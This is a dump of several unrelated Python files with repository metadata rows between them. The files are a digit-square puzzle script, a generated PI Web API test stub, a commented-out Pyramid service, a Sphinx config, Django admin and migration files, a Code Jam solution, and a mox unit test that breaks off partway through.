at = de * de + fa * fa
elif num > 100 & num < 1000:
hu = num / 100
de = num % 100 / 10
fa = num % 100 % 10
at = hu * hu + de * de + fa * fa
elif num > 1000:
th = num / 1000
hu = num % 1000 / 100
de = num % 1000 % 100 / 10
fa = num % 1000 % 100 % 10
at = th * th + hu * hu + de * de + fa * fa
else:
at = -1
return at
# Driver loop for T test cases.  NOTE(review): indentation was lost in this
# dump; the nesting below is a best-effort reconstruction -- verify against
# the original submission.
T=int(input())
for i in range(0,T):
    # `borad` (sic) is read but never used.
    borad=input()
    num=int(input())
    p=True
    number=0
    while p:
        # NOTE(review): with number starting at 0 this first iteration leaves
        # num unchanged; thereafter num grows by `number` each pass.
        num=number+num
        # `sum` shadows the builtin; holds the digit-square sum from test().
        sum = test(num)
        ttt = 0
        if sum == -1:
            p=False
        else:
            # Iterate the digit-square-sum map up to 10 times, looking for a
            # power-of-ten fixed point (happy-number style check).
            # NOTE(review): this inner `i` shadows the outer test-case index.
            for i in range(0, 10):
                sum = test(sum)
                sum = int(sum)
                if sum == 100:
                    ttt = 1
                    break
                elif sum == 1:
                    ttt = 1
                    break
                elif sum == 10:
                    ttt = 1
                    break
                elif sum == 1000:
                    ttt = 1
                    break
            if ttt == 1:
                # NOTE(review): p is set True here, so the while loop never
                # terminates via this branch -- suspected bug (p=False meant?).
                p=True
                print(num)
            number=number+1
"1069583789@qq.com"
] | 1069583789@qq.com |
ba81c2aa4666451fbfbd38a5a4791bfb95c2c518 | 2161711dcdc06abe39d96082edcc91ba4de95668 | /test/test_asset_database_api.py | 5ea2debeab40f54f3099df4feb90cffd954ce57f | [] | no_license | PriceTT/swagger-piwebapi-python | 7eb25c329b33a76785cdb0484fae0dfb354722e2 | 20a4a47a38dfe7051b1a35831fb6cd3d2a19679a | refs/heads/master | 2021-06-18T21:21:48.808589 | 2017-06-15T18:44:48 | 2017-06-15T18:44:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,687 | py | # coding: utf-8
"""
PI Web API 2017 Swagger Spec
Swagger Spec file that describes PI Web API
OpenAPI spec version: 1.9.0.266
Contact: techsupport@osisoft.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.apis.asset_database_api import AssetDatabaseApi
class TestAssetDatabaseApi(unittest.TestCase):
""" AssetDatabaseApi unit test stubs """
def setUp(self):
self.api = swagger_client.apis.asset_database_api.AssetDatabaseApi()
def tearDown(self):
pass
def test_asset_database_add_referenced_element(self):
"""
Test case for asset_database_add_referenced_element
Add a reference to an existing element to the specified database.
"""
pass
def test_asset_database_create_analysis_category(self):
"""
Test case for asset_database_create_analysis_category
Create an analysis category at the Asset Database root.
"""
pass
def test_asset_database_create_analysis_template(self):
"""
Test case for asset_database_create_analysis_template
Create an analysis template at the Asset Database root.
"""
pass
def test_asset_database_create_attribute_category(self):
"""
Test case for asset_database_create_attribute_category
Create an attribute category at the Asset Database root.
"""
pass
def test_asset_database_create_element(self):
"""
Test case for asset_database_create_element
Create a child element.
"""
pass
def test_asset_database_create_element_category(self):
"""
Test case for asset_database_create_element_category
Create an element category at the Asset Database root.
"""
pass
def test_asset_database_create_element_template(self):
"""
Test case for asset_database_create_element_template
Create a template at the Asset Database root. Specify InstanceType of \"Element\" or \"EventFrame\" to create element or event frame template respectively. Only these two types of templates can be created.
"""
pass
def test_asset_database_create_enumeration_set(self):
"""
Test case for asset_database_create_enumeration_set
Create an enumeration set at the Asset Database.
"""
pass
def test_asset_database_create_event_frame(self):
"""
Test case for asset_database_create_event_frame
Create an event frame.
"""
pass
def test_asset_database_create_security_entry(self):
"""
Test case for asset_database_create_security_entry
Create a security entry owned by the asset database.
"""
pass
def test_asset_database_create_table(self):
"""
Test case for asset_database_create_table
Create a table on the Asset Database.
"""
pass
def test_asset_database_create_table_category(self):
"""
Test case for asset_database_create_table_category
Create a table category on the Asset Database.
"""
pass
def test_asset_database_delete(self):
"""
Test case for asset_database_delete
Delete an asset database.
"""
pass
def test_asset_database_delete_security_entry(self):
"""
Test case for asset_database_delete_security_entry
Delete a security entry owned by the asset database.
"""
pass
def test_asset_database_export(self):
"""
Test case for asset_database_export
Export the asset database.
"""
pass
def test_asset_database_find_analyses(self):
"""
Test case for asset_database_find_analyses
Retrieve analyses based on the specified conditions.
"""
pass
def test_asset_database_find_element_attributes(self):
"""
Test case for asset_database_find_element_attributes
Retrieves a list of element attributes matching the specified filters from the specified asset database.
"""
pass
def test_asset_database_find_event_frame_attributes(self):
"""
Test case for asset_database_find_event_frame_attributes
Retrieves a list of event frame attributes matching the specified filters from the specified asset database.
"""
pass
def test_asset_database_get(self):
"""
Test case for asset_database_get
Retrieve an Asset Database.
"""
pass
def test_asset_database_get_analysis_categories(self):
"""
Test case for asset_database_get_analysis_categories
Retrieve analysis categories for a given Asset Database.
"""
pass
def test_asset_database_get_analysis_templates(self):
"""
Test case for asset_database_get_analysis_templates
Retrieve analysis templates based on the specified criteria. By default, all analysis templates in the specified Asset Database are returned.
"""
pass
def test_asset_database_get_attribute_categories(self):
"""
Test case for asset_database_get_attribute_categories
Retrieve attribute categories for a given Asset Database.
"""
pass
def test_asset_database_get_by_path(self):
"""
Test case for asset_database_get_by_path
Retrieve an Asset Database by path.
"""
pass
def test_asset_database_get_element_categories(self):
"""
Test case for asset_database_get_element_categories
Retrieve element categories for a given Asset Database.
"""
pass
def test_asset_database_get_element_templates(self):
"""
Test case for asset_database_get_element_templates
Retrieve element templates based on the specified criteria. Only templates of instance type \"Element\" and \"EventFrame\" are returned. By default, all element and event frame templates in the specified Asset Database are returned.
"""
pass
def test_asset_database_get_elements(self):
"""
Test case for asset_database_get_elements
Retrieve elements based on the specified conditions. By default, this method selects immediate children of the specified asset database.
"""
pass
def test_asset_database_get_enumeration_sets(self):
"""
Test case for asset_database_get_enumeration_sets
Retrieve enumeration sets for given asset database.
"""
pass
def test_asset_database_get_event_frames(self):
"""
Test case for asset_database_get_event_frames
Retrieve event frames based on the specified conditions. By default, returns all children of the specified root resource with a start time in the past 8 hours.
"""
pass
def test_asset_database_get_referenced_elements(self):
"""
Test case for asset_database_get_referenced_elements
Retrieve referenced elements based on the specified conditions. By default, this method selects all referenced elements at the root level of the asset database.
"""
pass
def test_asset_database_get_security(self):
"""
Test case for asset_database_get_security
Get the security information of the specified security item associated with the asset database for a specified user.
"""
pass
def test_asset_database_get_security_entries(self):
"""
Test case for asset_database_get_security_entries
Retrieve the security entries of the specified security item associated with the asset database based on the specified criteria. By default, all security entries for this asset database are returned.
"""
pass
def test_asset_database_get_security_entry_by_name(self):
"""
Test case for asset_database_get_security_entry_by_name
Retrieve the security entry of the specified security item associated with the asset database with the specified name.
"""
pass
def test_asset_database_get_table_categories(self):
"""
Test case for asset_database_get_table_categories
Retrieve table categories for a given Asset Database.
"""
pass
def test_asset_database_get_tables(self):
"""
Test case for asset_database_get_tables
Retrieve tables for given Asset Database.
"""
pass
def test_asset_database_import(self):
"""
Test case for asset_database_import
Import an asset database.
"""
pass
def test_asset_database_remove_referenced_element(self):
"""
Test case for asset_database_remove_referenced_element
Remove a reference to an existing element from the specified database.
"""
pass
def test_asset_database_update(self):
"""
Test case for asset_database_update
Update an asset database by replacing items in its definition.
"""
pass
def test_asset_database_update_security_entry(self):
"""
Test case for asset_database_update_security_entry
Update a security entry owned by the asset database.
"""
pass
if __name__ == '__main__':
unittest.main()
| [
"eng@dstcontrols.com"
] | eng@dstcontrols.com |
1c5fedb67468760e5c3073345d8d2eb82b9228ea | 050ccac41c3b3b217204eb5871ca987f897b8d56 | /tradeorsale/apps/item/events.py | 0cef9d23f7d18247f34355e0ff52e24a94de8e5d | [] | no_license | marconi/tradeorsale | 6aefc7760f389aabd7e08fe40953914f5ea60abc | 6750260734f77cbf60c19ddddc83ebd27a5fb3a9 | refs/heads/master | 2021-01-23T20:21:24.210074 | 2013-01-12T09:05:09 | 2013-01-12T09:05:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | py | # # -*- coding: utf-8 -*-
# import logging
# from cornice import Service
# from sqlalchemy.orm.exc import NoResultFound
# from pyramid.i18n import TranslationString as _
# from tradeorsale.apps.item.models import Item
# from tradeorsale.libs.models import DBSession
# logger = logging.getLogger('tradeorsale')
# json_header = {'Content-Type': 'application/json'}
# event_service = Service(name='item_events', path='/items/events')
# VALID_ACTIONS = ('comment.created',)
# def validate_action(request):
# action = request.POST.get('action', None)
# if not action or action not in VALID_ACTIONS:
# request.errors.add('body', 'action', _(u'Invalid action'))
# def validate_item(request):
# try:
# item_id = int(request.POST.get('item_id', 0))
# try:
# DBSession.query(Item).filter_by(id=item_id).one()
# except NoResultFound:
# request.errors.add('body', 'item_id', _(u"Item doesn't exist"))
# except ValueError:
# request.errors.add('body', 'item_id', _(u'Invalid Item ID'))
# @event_service.post(validators=(validate_action, validate_item))
# def item_event_post(request):
# item_id = request.POST['item_id']
# action = request.POST['action']
# redis = request.registry.redis
# if action == 'comment.created':
# if not redis.hget('comments:counter', item_id):
# redis.hset('comments:counter', item_id, 1)
# else:
# redis.hincrby('comments:counter', item_id)
# return True
| [
"caketoad@gmail.com"
] | caketoad@gmail.com |
9d57ea2c53588e2cb3e350113d18909ff1eb8c5b | 3a0bbcf55a9150cfd2ead618012553741387447a | /doc/conf.py | 51b6e782bba28d581904ac53ebc2ea34baa701ce | [
"BSD-2-Clause"
] | permissive | mrgloom/pystruct | 3a086ceb5c64be689bdf7ece773e3428d903bcc2 | 08277d5a102e813958c9d76dd3fcc413ddb4889f | refs/heads/master | 2021-01-23T21:33:20.201433 | 2013-09-14T14:38:03 | 2013-09-14T14:38:03 | 12,946,517 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,771 | py | # -*- coding: utf-8 -*-
#
# pystruct documentation build configuration file, created by
# sphinx-quickstart on Fri May 3 17:14:50 2013.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('sphinxext'))
# -- General configuration ----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# Sphinx extension modules: local helpers from sphinxext/ (gen_rst,
# numpy_ext.numpydoc) plus stock sphinx.ext.* extensions.
extensions = ['gen_rst', 'sphinx.ext.autodoc', 'sphinx.ext.autosummary',
              'sphinx.ext.doctest', 'sphinx.ext.pngmath',
              'sphinx.ext.viewcode', 'numpy_ext.numpydoc']

# Generate autosummary stub pages even when nothing references them.
# (The original assigned this twice; one assignment suffices.)
autosummary_generate = True
autodoc_default_flags = ['members', 'inherited-members']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pystruct'
copyright = u'2013, Andreas Mueller'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', '_templates', '_themes']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'pystruct'
html_theme = 'bootstrap'
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['_themes']
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
#pystruct The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pystructdoc'
# -- Options for LaTeX output -------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('index', 'pystruct.tex', u'pystruct Documentation',
u'Andreas Mueller', 'manual'), ]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output -------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pystruct', u'pystruct Documentation',
[u'Andreas Mueller'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pystruct', u'pystruct Documentation', u'Andreas Mueller',
'pystruct', 'One line description of project.', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Theme options are theme-specific and customize the look and feel of a
# theme further.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "PyStruct",
# Tab name for entire site. (Default: "Site")
#'navbar_site_name': "Site",
# A list of tuples containting pages to link to. The value should
# be in the form [(name, page), ..]
'navbar_links': [
('Introduction', 'intro'),
('Examples', 'auto_examples/index'),
('References', 'references'),
],
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 0,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "None",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing with "" (default) or the name of a valid theme
# such as "amelia" or "cosmo".
#
# Note that this is served off CDN, so won't be available offline.
#'bootswatch_theme': "united",
}
| [
"amueller@ais.uni-bonn.de"
] | amueller@ais.uni-bonn.de |
69825a5a9bffc35dd9540519400ec2f710db6246 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5670465267826688_1/Python/cvarad/abc.py | 1720f7c8ffacfd6974b6e997e64ca36d68e8cbc7 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,505 | py | mult = {('j', '1'): 'j', ('k', 'i'): 'j', ('1', 'j'): 'j', ('1', '1'): '1', ('k', 'j'): '-i', ('1', 'k'): 'k', ('k', 'k'): '-1', ('j', 'i'): '-k', ('k', '1'): 'k', ('i', 'j'): 'k', ('1', 'i'): 'i', ('i', 'k'): '-j', ('j', 'k'): 'i', ('i', 'i'): '-1', ('i', '1'): 'i', ('j', 'j'): '-1'}
def multiply(x, y):
    """Multiply two quaternion units and return the product as a string.

    Each operand is one of '1', 'i', 'j', 'k', optionally prefixed with
    '-' (e.g. '-j'); the result uses the same representation.

    The original implementation duplicated the table lookup and sign
    handling across four branches; here the sign is factored out once.
    """
    # Products of the *positive* base units (Hamilton's rules:
    # i*i = j*j = k*k = -1, i*j = k, j*k = i, k*i = j, and their
    # anti-commutative counterparts). Kept local so the function is
    # self-contained; content matches the module-level `mult` table.
    base = {
        ('1', '1'): '1', ('1', 'i'): 'i', ('1', 'j'): 'j', ('1', 'k'): 'k',
        ('i', '1'): 'i', ('i', 'i'): '-1', ('i', 'j'): 'k', ('i', 'k'): '-j',
        ('j', '1'): 'j', ('j', 'i'): '-k', ('j', 'j'): '-1', ('j', 'k'): 'i',
        ('k', '1'): 'k', ('k', 'i'): 'j', ('k', 'j'): '-i', ('k', 'k'): '-1',
    }
    # The overall sign flips exactly when one (not both) operand is negative.
    flip = (x[0] == '-') != (y[0] == '-')
    # x[-1] / y[-1] is the base unit regardless of a '-' prefix.
    res = base[x[-1], y[-1]]
    if flip:
        # Negate: strip a leading '-' or prepend one.
        res = res[1] if res[0] == '-' else '-' + res
    return res
# NOTE: Python 2 source (input()/raw_input(), print statements).
if __name__ == '__main__':
	t = input()
	# Each case: the string s repeated x times must split into three
	# consecutive, non-empty parts whose quaternion products are i, j
	# and k respectively.
	for i in range(1, t+1):
		l, x = map(int, raw_input().split())
		s = raw_input()
		# Fewer than 3 characters total, or one single repeated letter,
		# can never form the three required parts.
		if l*x < 3 or len(set(s)) == 1:
			print "Case #" + str(i) + ": NO"
			continue
		if x <= 4:
			# Small repetition count: materialise the whole string and scan.
			s = s*x
			found = 0
			first = '1'
			index = 0
			# Shortest prefix whose running product is i.
			for a in range(0, len(s)-2):
				first = multiply(first, s[a])
				if first == 'i':
					found = 1
					index = a
					break
			if found == 0:
				print "Case #" + str(i) + ": NO"
				continue
			found = 0
			first = '1'
			# Next segment whose running product is j.
			for b in range(index+1, len(s)-1):
				first = multiply(first, s[b])
				if first == 'j':
					found = 1
					index = b
					break
			if found == 0:
				print "Case #" + str(i) + ": NO"
				continue
			first = '1'
			# The remainder must multiply to k.
			for c in range(index+1, len(s)):
				first = multiply(first, s[c])
			if first == 'k':
				print "Case #" + str(i) + ": YES"
			else:
				print "Case #" + str(i) + ": NO"
		else:
			# Large x: scan only 4 copies at a time — every element of the
			# quaternion group has order dividing 4, so the running product
			# over repeated copies cycles within 4 repetitions.
			copy_s = s
			s = copy_s*4
			x -= 4
			found = 0
			first = '1'
			index = 0
			for a in range(0, len(s)):
				first = multiply(first, s[a])
				if first == 'i':
					found = 1
					index = a
					break
			if found == 0:
				print "Case #" + str(i) + ": NO"
				continue
			# Rebuild the tail: what's left after the i-prefix, plus up to
			# 4 more copies for the j-scan.
			if x >= 4:
				s = s[index+1:] + copy_s*4
				x -= 4
			else:
				s = s[index+1:] + copy_s*x
				x = 0
			found = 0
			first = '1'
			for b in range(0, len(copy_s)*4):
				first = multiply(first, s[b])
				if first == 'j':
					found = 1
					index = b
					break
			if found == 0:
				print "Case #" + str(i) + ": NO"
				continue
			# Remaining copies (x % 4 suffices by the same cycling argument)
			# must multiply to k.
			s = s[index+1:] + copy_s*(x%4)
			first = '1'
			for c in range(0, len(s)):
				first = multiply(first, s[c])
			if first == 'k':
				print "Case #" + str(i) + ": YES"
			else:
				print "Case #" + str(i) + ": NO"
"eewestman@gmail.com"
] | eewestman@gmail.com |
1bea2d0ad3996f39218a58d6b1b0ab794fe1b9d9 | c00f701c7d4f765b1be9c0a1d68861551b063185 | /pages/admin.py | 9fd844fc98e431223bb9e097241c2404a0b613f6 | [] | no_license | Aditta-das/vege | f52921de10e492b775defc0f698cc784e011f1a9 | 881d99de1ae44787d504b1bb3647c873b7e7a32f | refs/heads/master | 2020-12-23T19:50:18.570462 | 2020-01-30T17:11:07 | 2020-01-30T17:11:07 | 237,255,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.contrib import admin
from .models import Detail, Comment
# Register your models here.
class Admin(admin.ModelAdmin):
    """Change-list configuration for the Detail model in Django admin."""
    # Columns shown on the change-list page.
    list_display = ('id', 'title', 'category', 'is_stock', 'price')
    # Columns that link through to the edit form.
    list_display_links = ('id', 'title')
# Detail uses the customised Admin above; Comment uses the default ModelAdmin.
admin.site.register(Detail, Admin)
admin.site.register(Comment)
| [
"ndas5662@gmail.com"
] | ndas5662@gmail.com |
dccf38d64ab43cb8022c1097d9c82acdc491b23a | b09920ecdce8ab84df6a3b24b420d14c2c846078 | /GrantHolders/migrations/0002_auto_20201226_1723.py | fb6fab5051eec95566994b38a46b86eaa5c75baa | [] | no_license | BakdauletBolatE/sciense2020 | becdf64a3ecdfd35651b34cc045e09ee6ca804b9 | 4ed24162c056fc95bf8c02800116eddaf48c6387 | refs/heads/main | 2023-02-11T15:13:52.307403 | 2021-01-02T12:46:05 | 2021-01-02T12:46:05 | 324,537,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | # Generated by Django 3.1.4 on 2020-12-26 17:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration altering two GrantHolders fields.

    Changes the ``poster`` image field and the ``subject`` foreign key of
    the ``grantholders`` model (verbose names are in Kazakh and must not
    be edited here — they are user-facing strings).
    """

    dependencies = [
        ('GrantHolders', '0001_initial'),
    ]

    operations = [
        # Grant holder's photo, stored under graduate_img/.
        migrations.AlterField(
            model_name='grantholders',
            name='poster',
            field=models.ImageField(upload_to='graduate_img/', verbose_name='Грант иегерінің суреті'),
        ),
        # Optional FK to the subject; cascades on delete.
        migrations.AlterField(
            model_name='grantholders',
            name='subject',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='GrantHolders.subject', verbose_name='Грант иегерінің пәні'),
        ),
    ]
| [
"bakosh21345@gmail.com"
] | bakosh21345@gmail.com |
657e83359651d28d59d3c8c43f3f9ecfd7ae5c7a | b45d66c2c009d74b4925f07d0d9e779c99ffbf28 | /tests/unit_tests/core_tests/service_tests/main_tests/test_main_retail_input_endpoints.py | 5b43f5ae98c9a1212f70f561e05c1f1ea8ed82b7 | [] | no_license | erezrubinstein/aa | d96c0e39762fe7aaeeadebbd51c80b5e58576565 | a3f59ba59519183257ed9a731e8a1516a4c54b48 | refs/heads/master | 2021-03-12T23:44:56.319721 | 2016-09-18T23:01:17 | 2016-09-18T23:01:17 | 22,665,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,352 | py | from core.service.svc_main.implementation.service_endpoints.retail_input_endpoints import RetailInputEndpoints
from core.service.svc_main.implementation.service_endpoints.endpoint_field_data import *
from common.helpers.common_dependency_helper import register_common_mox_dependencies
from common.utilities.inversion_of_control import dependencies, Dependency
import json
import mox
__author__ = 'vgold'
class RetailInputEndpointsTests(mox.MoxTestBase):
    """Unit tests for RetailInputEndpoints using mox record/replay mocks.

    NOTE: mox verifies recorded calls in order, so the statement order
    inside each test IS the expected call order — do not reorder.
    """

    def setUp(self):
        """Build a fully mocked RetailInputEndpoints and caller context."""
        # call parent set up
        super(RetailInputEndpointsTests, self).setUp()
        # register mock dependencies
        register_common_mox_dependencies(self.mox)
        # get several dependencies that we'll need in the class
        self.mock_main_access = Dependency("CoreAPIProvider").value
        # Set mock attributes on WorkflowService instance for calls to record
        self.mock = self.mox.CreateMock(RetailInputEndpoints)
        self.mock.main_access = self.mox.CreateMockAnything()
        self.mock.main_access.wfs = self.mox.CreateMockAnything()
        self.mock.main_access.mds = self.mox.CreateMockAnything()
        self.mock.main_param = self.mox.CreateMockAnything()
        self.mock.em_access = self.mox.CreateMockAnything()
        self.mock.excel_helper = self.mox.CreateMockAnything()
        self.mock.cache_rec_options = {"has_metadata": True}
        self.mock.store_helper = self.mox.CreateMockAnything()
        self.mock.rir_helper = self.mox.CreateMockAnything()
        self.mock.address_helper = self.mox.CreateMockAnything()
        self.mock.WorkflowTaskGroup = self.mox.CreateMockAnything()
        self.mock.CompanyInfo = self.mox.CreateMockAnything()
        self.mock.SingleRirAdder = self.mox.CreateMockAnything()
        self.mock.QCTaskCreator = self.mox.CreateMockAnything()
        self.mock.RetailInputFileUploader = self.mox.CreateMockAnything()
        self.mock.WorkflowNextTaskGetter = self.mox.CreateMockAnything()
        # Set mock attributes on WorkflowService instance for calls to ignore
        self.mock.cfg = Dependency("MoxConfig").value
        self.mock.logger = Dependency("FlaskLogger").value
        # Create caller context
        self.context = {"user_id": 1, "source": "test_main_retail_input_endpoints.py",
                        "user": {"user_id": 1, "is_generalist": False},
                        "team_industries": ["asdf"]}

    def doCleanups(self):
        """Drop registered dependencies so tests stay isolated."""
        super(RetailInputEndpointsTests, self).doCleanups()
        dependencies.clear()

    ##########################################################################
    # RetailInputEndpoints.get_preset_retail_input_summary_collections()

    def test_get_preset_retail_input_summary_collections(self):
        """Endpoint formats paging + query params, then queries WFS."""
        request = self.mox.CreateMockAnything()
        params = {"helo": "moto"}
        request.args = {"params": json.dumps(params), "context": json.dumps(self.context)}
        paging_params = {"paging_params": "paging_params"}
        self.mock._format_page_and_sort_params(params, field_list = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS).AndReturn(paging_params)
        query = {"query": "query"}
        self.mock._format_query_from_field_filters(RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
                                                   RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
                                                   params).AndReturn(query)
        params = dict(paging_params, query = query, fields = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS)
        data = "data"
        self.mock.main_access.wfs.call_task_group_data(self.context, params).AndReturn(data)
        self.mox.ReplayAll()
        results = RetailInputEndpoints.get_preset_retail_input_summary_collections(self.mock, request)
        self.assertEqual(results, data)

    ##########################################################################
    # RetailInputEndpoints.post_retail_input_add_one_record()

    def test_post_retail_input_add_one_record(self):
        """Endpoint delegates to SingleRirAdder(async=True) and returns run()."""
        data = "data"
        files = "files"
        single_rir_adder = self.mox.CreateMockAnything()
        # NOTE(review): `async` became a reserved word in Python 3.7+; this
        # recorded keyword call only parses on older interpreters.
        self.mock.SingleRirAdder(data, files, self.context, async=True).AndReturn(single_rir_adder)
        single_rir_adder.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.post_retail_input_add_one_record(self.mock, data, files, self.context, True)
        self.assertEqual('a', results)

    ##########################################################################
    # RetailInputEndpoints.post_retail_input_record_validation_create_qc()

    def test_post_retail_input_record_validation_create_qc(self):
        """Endpoint delegates to QCTaskCreator and returns its run() result."""
        data = "data"
        qc_task_creator = self.mox.CreateMockAnything()
        self.mock.QCTaskCreator(data, self.context).AndReturn(qc_task_creator)
        qc_task_creator.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.post_retail_input_record_validation_create_qc(self.mock, data, self.context)
        self.assertEqual('a', results)

    ##########################################################################
    # RetailInputEndpoints.post_retail_input_file_upload()

    def test_post_retail_input_file_upload(self):
        """Endpoint delegates to RetailInputFileUploader and returns run()."""
        data = "data"
        files = "files"
        rif_uploader = self.mox.CreateMockAnything()
        self.mock.RetailInputFileUploader(data, files, self.context).AndReturn(rif_uploader)
        rif_uploader.run().AndReturn("a")
        self.mox.ReplayAll()
        results = RetailInputEndpoints.post_retail_input_file_upload(self.mock, data, files, self.context)
        self.assertEqual('a', results)

    ##########################################################################
    # RetailInputEndpoints.get_preset_retail_input_record_validation_next_target()

    def test_get_preset_retail_input_record_validation_next_target(self):
